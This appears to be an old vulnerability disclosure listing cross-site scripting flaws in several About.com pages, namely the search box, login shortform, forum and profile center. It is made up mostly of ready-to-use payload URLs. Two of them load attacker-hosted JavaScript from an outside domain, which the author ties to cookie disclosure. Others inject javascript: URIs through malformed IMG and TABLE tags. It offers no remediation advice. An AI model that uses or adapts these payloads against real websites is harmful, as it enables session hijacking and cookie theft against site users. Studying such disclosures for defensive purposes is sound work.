About.com Homepage: http://www.about.com Effected files: Search input box fullsearch.htm shortform.htm forum.aspx profile_center.asp posting in the forum ----------------------------------- Search input box xss vuln with cookie disclosure: Works by putting the <script> tags in the input box, or doing url injection. There seemsto be no sanatizing user input here. PoC: http://search.about.com/fullsearch.htm?terms=<script%20src=http://www.youfucktard.com/xs.js></script> Screenshots: http://www.youfucktard.com/xsp/about1.jpg http://www.youfucktard.com/xsp/about2.jpg ----------------------------------------- Shortform.htm XSS vuln no filter evasion needed: http://login.about.com/shortform.htm?Error=<SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT> Screenshots: http://www.youfucktard.com/xsp/about3.jpg --------------------------------------------- Forum.aspx xss vuln. Here we have malformed image tags, as well as empty script tags: PoC: http://forums.about.com/n/pfx/forum.aspx?nav=messages&tsn=<IMG%20"""><SCRIPT></SCRIPT>">1&tid=1456">">"><"">'>'>'><"<IMG%20"""><IMG%20"""><SCRIPT></SCRIPT>"><SCRIPT>alert("XSS")</SCRIPT>">"><"<"<"<"<""><"<"<'<'&webtag=ab-vgstrategies ------------------------------------------------------ Profile_center.asp xss vuln: http://forums.about.com/dir-app/bbCard/profile_center.asp?webtag=ab-vgstrategies&cType=2&uName=jonne1234";>">"><IMG%20SRC=javascript:alert('XSS')><"<"<"&dMode=0&eBtn=0&uid=1574961808 ------------------------------------------------------ Posting in the forum XSS vuln. This time we'll use the allowed tags <table>. For PoC try posting this in the forum: <TABLE><TD BACKGROUND="javascript:alert('XSS')"> <TABLE BACKGROUND="javascript:alert('XSS')"> Screenshots: http://www.youfucktard.com/xsp/about4.jpg http://www.youfucktard.com/xsp/about5.jpg
